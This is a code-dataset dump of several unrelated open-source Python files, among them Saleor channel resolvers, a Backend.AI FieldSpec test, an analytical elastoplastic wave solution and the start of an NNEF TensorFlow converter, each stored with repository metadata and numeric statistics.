604499f9fa55d1ce9698ca05f85ddb54a88f1cab
|
[
"CC-BY-3.0"
] | null | null | null |
src/isaw.facultycv/isaw/facultycv/interfaces/peopleview.py
|
isawnyu/isaw.web
|
604499f9fa55d1ce9698ca05f85ddb54a88f1cab
|
[
"CC-BY-3.0"
] | 405
|
2015-03-12T18:20:25.000Z
|
2022-03-07T18:44:16.000Z
|
src/isaw.facultycv/isaw/facultycv/interfaces/peopleview.py
|
isawnyu/isaw.web
|
604499f9fa55d1ce9698ca05f85ddb54a88f1cab
|
[
"CC-BY-3.0"
] | 1
|
2016-11-07T21:18:49.000Z
|
2016-11-07T21:18:49.000Z
|
from zope.interface import Interface
class IPeopleView(Interface):
"""People View.
"""
| 41.2
| 147
| 0.325243
| 10
| 206
| 6.7
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.621359
| 206
| 4
| 148
| 51.5
| 0.858974
| 0.058252
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7d562a20da4ff16ea89ead622e2fcd5bfd4feed6
| 35
|
py
|
Python
|
my_test_proj/__init__.py
|
ColumbiaOSS/4995-demo
|
59ed33c6640935387b6e89b4db492ba92a2457a1
|
[
"Apache-2.0"
] | 1
|
2021-05-21T11:44:08.000Z
|
2021-05-21T11:44:08.000Z
|
my_test_proj/__init__.py
|
ColumbiaOSS/4995-demo
|
59ed33c6640935387b6e89b4db492ba92a2457a1
|
[
"Apache-2.0"
] | 1
|
2020-09-29T18:50:34.000Z
|
2020-10-04T22:57:39.000Z
|
my_test_proj/__init__.py
|
ColumbiaOSS/4995-demo
|
59ed33c6640935387b6e89b4db492ba92a2457a1
|
[
"Apache-2.0"
] | 8
|
2020-09-17T22:08:10.000Z
|
2020-12-26T08:23:51.000Z
|
from .foo import inc # noqa: F401
| 17.5
| 34
| 0.685714
| 6
| 35
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 0.228571
| 35
| 1
| 35
| 35
| 0.777778
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7d8754fb92a0b65b067a61f764de9144df30896e
| 179
|
py
|
Python
|
saleor/graphql/channel/resolvers.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 15,337
|
2015-01-12T02:11:52.000Z
|
2021-10-05T19:19:29.000Z
|
saleor/graphql/channel/resolvers.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 7,486
|
2015-02-11T10:52:13.000Z
|
2021-10-06T09:37:15.000Z
|
saleor/graphql/channel/resolvers.py
|
aminziadna/saleor
|
2e78fb5bcf8b83a6278af02551a104cfa555a1fb
|
[
"CC-BY-4.0"
] | 5,864
|
2015-01-16T14:52:54.000Z
|
2021-10-05T23:01:15.000Z
|
from ...channel import models
def resolve_channel(id):
return models.Channel.objects.filter(id=id).first()
def resolve_channels():
return models.Channel.objects.all()
| 17.9
| 55
| 0.73743
| 24
| 179
| 5.416667
| 0.541667
| 0.153846
| 0.292308
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134078
| 179
| 9
| 56
| 19.888889
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
7db16feabfd7af389f415f15cb28445935206dac
| 1,748
|
py
|
Python
|
tests/output/test_types.py
|
youngjun0627/backend.ai-client-py
|
be7c174ab73e112fdb8be61e6affc20fc72f7d59
|
[
"MIT"
] | 7
|
2019-01-18T08:08:42.000Z
|
2022-02-10T00:36:24.000Z
|
tests/output/test_types.py
|
youngjun0627/backend.ai-client-py
|
be7c174ab73e112fdb8be61e6affc20fc72f7d59
|
[
"MIT"
] | 179
|
2017-09-07T04:54:44.000Z
|
2022-03-29T11:30:47.000Z
|
tests/output/test_types.py
|
youngjun0627/backend.ai-client-py
|
be7c174ab73e112fdb8be61e6affc20fc72f7d59
|
[
"MIT"
] | 13
|
2017-09-08T05:37:44.000Z
|
2021-09-14T23:35:31.000Z
|
from ai.backend.client.output.types import FieldSet, FieldSpec
def test_fieldspec_init():
f = FieldSpec("key_foo")
assert f.field_ref == "key_foo"
assert f.field_name == "key_foo"
assert f.humanized_name == "Key Foo"
assert f.alt_name == "key_foo"
assert not f.subfields
f = FieldSpec("key_foo", "Foo")
assert f.field_ref == "key_foo"
assert f.field_name == "key_foo"
assert f.humanized_name == "Foo"
assert f.alt_name == "key_foo"
assert not f.subfields
fs = FieldSet([f])
assert fs["key_foo"] == f
f = FieldSpec("key_foo", "Foo", alt_name="key_fuu")
assert f.field_ref == "key_foo"
assert f.field_name == "key_foo"
assert f.humanized_name == "Foo"
assert f.alt_name == "key_fuu"
assert not f.subfields
fs = FieldSet([f])
assert fs["key_fuu"] == f
f = FieldSpec("key_foo { bar }")
assert f.field_ref == "key_foo { bar }"
assert f.field_name == "key_foo"
assert f.humanized_name == "Key Foo"
assert not f.subfields # not initialized in this case
f = FieldSpec("key_foo", subfields=FieldSet([
FieldSpec("bar"),
FieldSpec("baz", alt_name="bbb"),
]))
assert f.field_ref == "key_foo { bar baz }"
assert f.field_name == "key_foo"
assert f.humanized_name == "Key Foo"
assert f.subfields["bar"].field_ref == "bar"
assert f.subfields["bbb"].field_ref == "baz"
f = FieldSpec("key_foo", subfields=FieldSet([
FieldSpec("bar", subfields=FieldSet([
FieldSpec("kaz"),
])),
]))
assert f.field_ref == "key_foo { bar { kaz } }"
assert f.field_name == "key_foo"
assert f.humanized_name == "Key Foo"
assert f.subfields["bar"].field_ref == "bar { kaz }"
| 30.666667
| 62
| 0.617849
| 249
| 1,748
| 4.128514
| 0.13253
| 0.145914
| 0.18677
| 0.164397
| 0.802529
| 0.738327
| 0.729572
| 0.646887
| 0.559339
| 0.559339
| 0
| 0
| 0.231121
| 1,748
| 56
| 63
| 31.214286
| 0.764881
| 0.016018
| 0
| 0.574468
| 0
| 0
| 0.170547
| 0
| 0
| 0
| 0
| 0
| 0.638298
| 1
| 0.021277
| false
| 0
| 0.021277
| 0
| 0.042553
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7dc102d84c4c429de6ca78e362e8e305e7c6d34e
| 24
|
py
|
Python
|
examples/thresholds/__init__.py
|
sonyccd/simple-cv-examples
|
21be481996dd4643bda16abd9831a741e2904323
|
[
"MIT"
] | null | null | null |
examples/thresholds/__init__.py
|
sonyccd/simple-cv-examples
|
21be481996dd4643bda16abd9831a741e2904323
|
[
"MIT"
] | null | null | null |
examples/thresholds/__init__.py
|
sonyccd/simple-cv-examples
|
21be481996dd4643bda16abd9831a741e2904323
|
[
"MIT"
] | null | null | null |
from .automatic import *
| 24
| 24
| 0.791667
| 3
| 24
| 6.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 24
| 1
| 24
| 24
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8173cded67025977a072cd83371af13f995804f7
| 12,301
|
py
|
Python
|
codes/comparison/computeAnalyticalSolutionISO.py
|
adRenaud/research
|
2f0062a1800d7a17577bbfc2393b084253d567f4
|
[
"MIT"
] | 1
|
2021-06-18T14:52:03.000Z
|
2021-06-18T14:52:03.000Z
|
codes/comparison/computeAnalyticalSolutionISO.py
|
adRenaud/research
|
2f0062a1800d7a17577bbfc2393b084253d567f4
|
[
"MIT"
] | 1
|
2019-01-07T13:11:11.000Z
|
2019-01-07T13:11:11.000Z
|
codes/comparison/computeAnalyticalSolutionISO.py
|
adRenaud/research
|
2f0062a1800d7a17577bbfc2393b084253d567f4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import numpy as np
import pdb
def computeAnalyticalSolutionISO(x,L,c,t,vd,HEL,E,H,rho):
#Definition and initialization of arrays and data
lam=mu=1.
Sexact = np.zeros(len(x))
EPexact = np.zeros(len(x))
Vexact = np.zeros(len(x))
HT = E*H/(E+H)#(2.0*lam*mu+(lam+2.0*mu)*(mu+H))/(3.0*mu+H)
cp = np.sqrt(HT/rho)
##Comment: The analytical solution is defined according to the current time t
#times (and positions) associated to wave interactions
t1 = (L/2.0)/c
t2 = L/(c+cp);x2p = L+(t2/2.0)*(cp-c);x2m = (t2/2.0)*(c-cp)
t3 = (L-x2p)/c+t2
t4 = (x2p-x2m)/(2.0*c) +t2
t5 = L/(4.0*c) + (t3+t4)/2.0 ; x5p = 3.0*L/4.0 + c*(t3-t4)/2.0
x5m = L/2.0- (x5p-L/2.0)
t6 = (x5p-L/2.0)/c + t5
t7 = (t5+t6)/2.0 + (x5p-(L/2.0))/(2.0*cp)
x7p = (x5p+(L/2.0))/2.0 + cp*(t5-t6)/2.0
x7m = L/2.0- (x7p-L/2.0)
t8 = (L/2.0-x7m)/cp + t7
tint = (L/2.0-x7m)/cp + t8
t9 = (L-x5p)/c+t5
#Stress and velocity states
v1 = HEL/(rho*c)-vd ; v1p = -v1 ; v2 = 0.0
v3 = 2.0*HEL/(rho*c) - vd ; v3p = -v3
S2 = HEL*(1.0-(cp/c))+rho*cp*vd
v4 = S2/(2.0*rho*c) + v3/2.0 ; v4p = -v4
S4 = (S2-(rho*c*v3))/2.0
S5 = -2.0*HEL+rho*c*vd
S7 = -HEL*(1.0+cp/c)+rho*cp*vd-(H*(S2-HEL)*(lam+2.0*mu)/(2.0*mu**2.0))*((lam+2.0*mu)/HT - 1.0)
v4 = S2/(2.0*rho*c) + v3/2.0 ; v6 = S4/(rho*c) + v4 ; v6p = -v6 ; v5 = 0.0
v7 = S7/(rho*c)+v6 ; v7p = (S5-S7)/(rho*c) ; v7s = -v7p ; v7t = -v7
S8 = S7 + rho*cp*(v7p-v7)/2.0
v8 = (v7+v7p)/2.0 ; v8p = -v8
S9 = S7 - rho*cp*v7p ; v9 = (v7p+v7s)/2.0
S10 = (S8+S9-rho*cp*v8)/2.0
v10 = (S9-S8)/(2.0*rho*cp) + v8/2.0 ; v10p = -v10
S11 = S10 - rho*cp*v10 ; v11 = 0.0
#Plastic strain states
# EP2 = ((S2 - HEL)/(2.0*mu))*(((lam+2.0*mu)/HT)-1.0)
# EP8 = EP2 + ((S8-S7)/(2.0*mu))*((lam+2.0*mu)/HT - 1.0)
# EP9 = EP2 + ((S9-S7)/(2.0*mu))*((lam+2.0*mu)/HT - 1.0)
# EP10int = EP9 + ((S10-S9)/(2.0*mu))*((lam+2.0*mu)/HT - 1.0)
# EP10ext = EP8 + ((S10-S8)/(2.0*mu))*((lam+2.0*mu)/HT - 1.0)
# EP11 = EP10int + ((S11-S10)/(2.0*mu))*((lam+2.0*mu)/HT - 1.0)
#pdb.set_trace()
if (t<t1):
for i,valx in enumerate(x):
if ((valx>=(-c*t+(L/2.0))) and (valx<=(-cp*t+(L/2.0)))):
Sexact[i] = HEL
Vexact[i] = v1
elif ((valx>=(cp*t+(L/2.0))) and (valx<=(c*t+(L/2.0)))):
Sexact[i] = HEL
Vexact[i] = v1p
elif ((valx>=(-cp*t+(L/2.0))) and (valx<=(cp*t+(L/2.0)))):
Sexact[i] = S2
Vexact[i] = v2
#EPexact[i] = EP2
elif (valx<(-c*t+(L/2.0))):
Vexact[i] = -vd
elif (valx>(c*t+(L/2.0))):
Vexact[i] = vd
elif (t>=t1) and (t<t2):
for i,valx in enumerate(x):
if ((valx>(c*(t-t1))) and (valx<(-cp*t+(L/2.0)))):
Sexact[i] = HEL
Vexact[i] = v1
elif ((valx<(L-c*(t-t1))) and (valx>(cp*t+(L/2.0)))):
Sexact[i] = HEL
Vexact[i] = v1p
elif ((valx>=(-cp*t+(L/2.0))) and (valx<=(cp*t+(L/2.0)))):
Sexact[i] = S2
Vexact[i] = v2
#EPexact[i] = EP2
elif (valx<(c*(t-t1))):
Vexact[i] = v3
elif (valx>(L-c*(t-t1))):
Vexact[i] = v3p
elif ((t>=t2) and (t<t3)):
for i,valx in enumerate(x):
if ((valx>x2m-c*(t-t2)) and (valx<x2m+c*(t-t2))):
Sexact[i] = S4
Vexact[i] = v4
elif ((valx<x2p+c*(t-t2)) and (valx>x2p-c*(t-t2))):
Sexact[i] = S4
Vexact[i] = v4p
elif (valx>x2m+c*(t-t2)) and (valx<x2p-c*(t-t2)):
Sexact[i] = S2
Vexact[i] = v2
elif (valx<x2m-c*(t-t2)):
Vexact[i] = v3
elif (valx>x2p+c*(t-t2)):
Vexact[i] = v3p
# if ((valx>=x2m) and (valx<=x2p)):
# EPexact[i] = EP2
elif ((t>=t3) and (t<t4)):
for i,valx in enumerate(x):
if ((valx>c*(t-t3)) and (valx<x2m+c*(t-t2))):
Sexact[i] = S4
Vexact[i] = v4
elif ((valx<L-c*(t-t3)) and (valx>x2p-c*(t-t2))):
Sexact[i] = S4
Vexact[i] = v4p
elif (valx>x2m+c*(t-t2)) and (valx<x2p-c*(t-t2)):
Sexact[i] = S2
Vexact[i] = v2
elif (valx<c*(t-t3)):
Vexact[i] = v6
elif (valx>L-c*(t-t3)):
Vexact[i] = v6p
# if ((valx>=x2m) and (valx<=x2p)):
# EPexact[i] = EP2
elif ((t>=t4) and (t<t5)):
for i,valx in enumerate(x):
if ((valx>c*(t-t3)) and (valx<L/2.0-c*(t-t4))):
Sexact[i] = S4
Vexact[i] = v4
elif ((valx<L-c*(t-t3)) and (valx>L/2.0+c*(t-t4))):
Sexact[i] = S4
Vexact[i] = v4p
elif (valx>L/2.0-c*(t-t4)) and (valx<L/2.0+c*(t-t4)):
Sexact[i] = S5
Vexact[i] = v5
elif (valx<c*(t-t3)):
Vexact[i] = v6
elif (valx>L-c*(t-t3)):
Vexact[i] = v6p
# if ((valx>=x2m) and (valx<=x2p)):
# EPexact[i] = EP2
elif ((t>=t5) and (t<t6)):
for i,valx in enumerate(x):
if ((valx>x5m-c*(t-t5)) and (valx<x5m-cp*(t-t5))):
Sexact[i] = S7
Vexact[i] = v7
elif ((valx>x5m+cp*(t-t5)) and (valx<x5m+c*(t-t5))):
Sexact[i] = S7
Vexact[i] = v7p
elif ((valx>x5p-c*(t-t5)) and (valx<x5p-cp*(t-t5))):
Sexact[i] = S7
Vexact[i] = v7s
elif ((valx>x5p+cp*(t-t5)) and (valx<x5p+c*(t-t5))):
Sexact[i] = S7
Vexact[i] = v7t
elif ((valx>x5m-cp*(t-t5)) and (valx<x5m+cp*(t-t5))):
Sexact[i] = S8
Vexact[i] = v8
elif ((valx>x5p-cp*(t-t5)) and (valx<x5p+cp*(t-t5))):
Sexact[i] = S8
Vexact[i] = v8p
elif ((valx>x5m+c*(t-t5)) and (valx<x5p-c*(t-t5))):
Sexact[i] = S5
Vexact[i] = v5
elif (valx<x5m-c*(t-t5)):
Vexact[i] = v6
elif (valx>x5p+c*(t-t5)):
Vexact[i] = v6p
# if (((valx>x5m-cp*(t-t5)) and (valx<x5m+cp*(t-t5))) \
# or ((valx>x5p-cp*(t-t5)) and (valx<x5p+cp*(t-t5)))):
# EPexact[i] = EP8
# elif (((valx>=x2m) and (valx<=x5m-cp*(t-t5))) \
# or ((valx>x5m+cp*(t-t5)) and (valx<x5p-cp*(t-t5))) \
# or ((valx>x5p+cp*(t-t5)) and (valx<=x2p))):
# EPexact[i] = EP2
elif ((t>=t6) and (t<t7)):
for i,valx in enumerate(x):
if ((valx>x5m-c*(t-t5)) and (valx<x5m-cp*(t-t5))):
Sexact[i] = S7
Vexact[i] = v7
elif ((valx>x5m+cp*(t-t5)) and (valx<L/2.0-cp*(t-t6))):
Sexact[i] = S7
Vexact[i] = v7p
elif ((valx>=L/2.0-cp*(t-t6)) and (valx<=L/2.0+cp*(t-t6))):
Sexact[i] = S9
Vexact[i] = v9
elif ((valx>L/2.0+cp*(t-t6)) and (valx<x5p-cp*(t-t5))):
Sexact[i] = S7
Vexact[i] = v7s
elif ((valx>x5p+cp*(t-t5)) and (valx<x5p+c*(t-t5))):
Sexact[i] = S7
Vexact[i] = v7t
elif ((valx>x5m-cp*(t-t5)) and (valx<x5m+cp*(t-t5))):
Sexact[i] = S8
Vexact[i] = v8
elif ((valx>x5p-cp*(t-t5)) and (valx<x5p+cp*(t-t5))):
Sexact[i] = S8
Vexact[i] = v8p
elif (valx<x5m-c*(t-t5)):
Vexact[i] = v6
elif (valx>x5p+c*(t-t5)):
Vexact[i] = v6p
# if (((valx>x5m-cp*(t-t5)) and (valx<x5m+cp*(t-t5))) \
# or ((valx>x5p-cp*(t-t5)) and (valx<x5p+cp*(t-t5)))):
# EPexact[i] = EP8
# elif ((valx>=L/2.0-cp*(t-t6)) and (valx<=L/2.0+cp*(t-t6))):
# EPexact[i] = EP9
# elif (((valx>=x2m) and (valx<=x5m-cp*(t-t5))) \
# or ((valx>=x5m+cp*(t-t5)) and (valx<L/2.0-cp*(t-t6))) \
# or ((valx>L/2.0+cp*(t-t6)) and (valx<=x5p-cp*(t-t5))) \
# or ((valx>x5p+cp*(t-t5)) and (valx<=x2p))):
# EPexact[i] = EP2
elif ((t>=t7) and (t<t8)):
for i,valx in enumerate(x):
if ((valx>x5m-c*(t-t5)) and (valx<x5m-cp*(t-t5))):
Sexact[i] = S7
Vexact[i] = v7
elif ((valx>x5p+cp*(t-t5)) and (valx<x5p+c*(t-t5))):
Sexact[i] = S7
Vexact[i] = v7t
elif ((valx>=x7m+cp*(t-t7)) and (valx<x7p-cp*(t-t7))):
Sexact[i] = S9
Vexact[i] = v9
elif ( valx>x7m-cp*(t-t7)) and (valx<x7m+cp*(t-t7)):
Sexact[i] = S10
Vexact[i] = v10
elif ( valx>x7p-cp*(t-t7)) and (valx<x7p+cp*(t-t7)):
Sexact[i] = S10
Vexact[i] = v10p
elif ((valx>x5m-cp*(t-t5)) and (valx<x7m-cp*(t-t7))):
Sexact[i] = S8
Vexact[i] = v8
elif ((valx>x7p+cp*(t-t7)) and (valx<x5p+cp*(t-t5))):
Sexact[i] = S8
Vexact[i] = v8p
elif (valx<x5m-c*(t-t5)):
Vexact[i] = v6
elif (valx>x5p+c*(t-t5)):
Vexact[i] = v6p
# if (((valx>x5m-cp*(t-t5)) and (valx<x7m-cp*(t-t7))) \
# or ((valx>x7p+cp*(t-t7)) and (valx<x5p+cp*(t-t5)))):
# EPexact[i] = EP8
# elif (((valx >x2m) and (valx<=x5m-cp*(t-t5))) \
# or ((valx>=x5p+cp*(t-t5)) and (valx<x2p))):
# EPexact[i] = EP2
# elif ((valx>x7m+cp*(t-t7)) and (valx<x7p-cp*(t-t7))):
# EPexact[i] = EP9
# elif ((( valx>x7m-cp*(t-t7)) and (valx<=x7m)) \
# or (( valx>=x7p) and (valx<x7p+cp*(t-t7)))):
# EPexact[i] = EP10ext
# elif ((( valx>x7m) and (valx<x7m+cp*(t-t7))) \
# or (( valx>x7p-cp*(t-t7)) and (valx<=x7p))):
# EPexact[i] = EP10int
elif ((t>=t8) and (t<t9)):
for i,valx in enumerate(x):
if ((valx>x5m-c*(t-t5)) and (valx<x5m-cp*(t-t5))):
Sexact[i] = S7
Vexact[i] = v7
elif ((valx>x5p+cp*(t-t5)) and (valx<x5p+c*(t-t5))):
Sexact[i] = S7
Vexact[i] = v7t
elif ((valx>x5m-cp*(t-t5)) and (valx<x7m-cp*(t-t7))):
Sexact[i] = S8
Vexact[i] = v8
elif ((valx>x7p+cp*(t-t7)) and (valx<x5p+cp*(t-t5))):
Sexact[i] = S8
Vexact[i] = v8p
elif (valx<x5m-c*(t-t5)):
Vexact[i] = v6
elif (valx>x5p+c*(t-t5)):
Vexact[i] = v6p
elif ( valx>x7m-cp*(t-t7)) and (valx<L/2.0-cp*(t-t8)):
Sexact[i] = S10
Vexact[i] = v10
elif ( valx>L/2.0+cp*(t-t8)) and (valx<x7p+cp*(t-t7)):
Sexact[i] = S10
Vexact[i] = v10p
elif (valx>=L/2.0-cp*(t-t8)) and (valx<=L/2.0+cp*(t-t8)):
Sexact[i] = S11
Vexact[i] = v11
#
# if (((valx>x5m-cp*(t-t5)) and (valx<x7m-cp*(t-t7))) \
# or ((valx>x7p+cp*(t-t7)) and (valx<x5p+cp*(t-t5)))):
# EPexact[i] = EP8
# elif (((valx >x2m) and (valx<=x5m-cp*(t-t5))) \
# or ((valx>=x5p+cp*(t-t5)) and (valx<x2p))):
# EPexact[i] = EP2
# elif ((valx>=L/2.0-cp*(t-t8)) and (valx<=L/2.0+cp*(t-t8))):
# EPexact[i] = EP11
# elif (( valx>x7m-cp*(t-t7) and (valx<L/2.0-cp*(t-t8))) \
# or (((valx>L/2.0+cp*(t-t8))) and (valx<x7p+cp*(t-t7)))):
# EPexact[i] = EP10ext
return Sexact,EPexact,Vexact
| 42.564014
| 98
| 0.398342
| 1,934
| 12,301
| 2.533092
| 0.062565
| 0.058788
| 0.04899
| 0.061237
| 0.809145
| 0.786895
| 0.771382
| 0.76138
| 0.713615
| 0.684834
| 0
| 0.098103
| 0.378506
| 12,301
| 288
| 99
| 42.711806
| 0.542708
| 0.215917
| 0
| 0.638009
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004525
| false
| 0
| 0.00905
| 0
| 0.0181
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8183944adf69274649908b7664dd19530dd5bf14
| 87
|
py
|
Python
|
easilyb/commands/__init__.py
|
xaled/easilyb
|
cdb5f738205f700b37e03c50d04061a2d1e730cc
|
[
"MIT"
] | null | null | null |
easilyb/commands/__init__.py
|
xaled/easilyb
|
cdb5f738205f700b37e03c50d04061a2d1e730cc
|
[
"MIT"
] | null | null | null |
easilyb/commands/__init__.py
|
xaled/easilyb
|
cdb5f738205f700b37e03c50d04061a2d1e730cc
|
[
"MIT"
] | null | null | null |
from easilyb.commands._commands import run_command_ex1, run_command, get_command_output
| 87
| 87
| 0.896552
| 13
| 87
| 5.538462
| 0.692308
| 0.277778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012195
| 0.057471
| 87
| 1
| 87
| 87
| 0.865854
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
81852ebe850912964f07845f4199e926dc198ce6
| 157
|
py
|
Python
|
spiketools/utils/__init__.py
|
CamHolman/spiketools
|
56c37a50413a015cfa9c75725cbe7d4ef54968a5
|
[
"Apache-2.0"
] | null | null | null |
spiketools/utils/__init__.py
|
CamHolman/spiketools
|
56c37a50413a015cfa9c75725cbe7d4ef54968a5
|
[
"Apache-2.0"
] | null | null | null |
spiketools/utils/__init__.py
|
CamHolman/spiketools
|
56c37a50413a015cfa9c75725cbe7d4ef54968a5
|
[
"Apache-2.0"
] | null | null | null |
"""Utility functions."""
from .spikes import restrict_range
from .utils import set_random_seed
from .data import get_value_by_time, get_value_by_time_range
| 26.166667
| 60
| 0.828025
| 25
| 157
| 4.8
| 0.64
| 0.133333
| 0.166667
| 0.233333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101911
| 157
| 5
| 61
| 31.4
| 0.851064
| 0.11465
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
81b3b5441ee6c54038825039812f063e8ef11bb8
| 170,121
|
py
|
Python
|
au-zone/nnef_converter/tensorflow/tf_converter.py
|
asdor/NNEF-Tools
|
e84c3db29c1bffbd1938d40a10765badc0848606
|
[
"Apache-2.0"
] | null | null | null |
au-zone/nnef_converter/tensorflow/tf_converter.py
|
asdor/NNEF-Tools
|
e84c3db29c1bffbd1938d40a10765badc0848606
|
[
"Apache-2.0"
] | null | null | null |
au-zone/nnef_converter/tensorflow/tf_converter.py
|
asdor/NNEF-Tools
|
e84c3db29c1bffbd1938d40a10765badc0848606
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2018 The Khronos Group Inc.
# Copyright (c) 2018 Au-Zone Technologies Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import math
import logging
import textwrap
import collections
import networkx as nx
import numpy as np
from ..common.importer_exporter import ImporterExporter
from ..common.nnef_data import * #NNEFTensor, TensorDataFile
from ..common.nnef_converter import *
from ..common.nnef_graph import *
from ..common import nnef_node as node
from .core.framework import graph_pb2
from .core.framework import attr_value_pb2
from .core.framework.node_def_pb2 import NodeDef
class TensorflowLogger(object):
single_line_sep = "---------------------------------------------------------------------------------------------------------------------------------"
double_line_sep = "===================================================================================================="
def __init__(self):
super(TensorflowLogger, self).__init__()
self.logger = logging.getLogger('nnef_convert')
def log_tf_node_info(self, tfnode, inputs, attrs):
title = "Importing Tensorflow Node: "
preferredWidth = 250
wrapper = textwrap.TextWrapper(initial_indent=title,
width=preferredWidth,
subsequent_indent=' ' * len(title))
self.logger.info(self.single_line_sep)
self.logger.info(wrapper.fill("Name \t%s"%(tfnode.name)))
wrapper = textwrap.TextWrapper(initial_indent=' ' * len(title),
width=preferredWidth,
subsequent_indent=' ' * len(title))
self.logger.info(wrapper.fill("Op \t%s"%(tfnode.op)))
unused_input_found = False
used_input_found = False
unused_attribute_found = False
used_attribute_found = False
if inputs is not None and tfnode.input is not None:
for cnt, input_item in enumerate(tfnode.input):
if cnt in inputs.values():
if not used_input_found:
used_input_found = True
self.logger.info(wrapper.fill(""))
self.logger.info(wrapper.fill("Used Inputs:"))
self.logger.info(wrapper.fill("\t%s"%(input_item)))
for cnt, input_item in enumerate(tfnode.input):
if cnt not in inputs.values():
if not unused_input_found:
unused_input_found = True
self.logger.info(wrapper.fill(""))
self.logger.info(wrapper.fill("Unused Inputs:"))
self.logger.info(wrapper.fill("\t%s"%(input_item)))
if attrs is not None and tfnode.attr is not None:
for key, value in tfnode.attr.items():
if key in attrs:
if not used_attribute_found:
used_attribute_found = True
self.logger.info(wrapper.fill(""))
self.logger.info(wrapper.fill("Used Attributes:"))
if self.log_level == 'debug':
self.logger.debug(wrapper.fill("\t'%s': %s" % (key, value)))
else:
self.logger.info(wrapper.fill("\t'%s'" % key))
for key, value in tfnode.attr.items():
if key not in attrs:
if not unused_attribute_found:
unused_attribute_found = True
self.logger.info(wrapper.fill(""))
self.logger.info(wrapper.fill("Unused Attributes:"))
if self.log_level == 'debug':
self.logger.debug(wrapper.fill("\t'%s': %s" % (key, value)))
else:
self.logger.info(wrapper.fill("\t'%s'" % key))
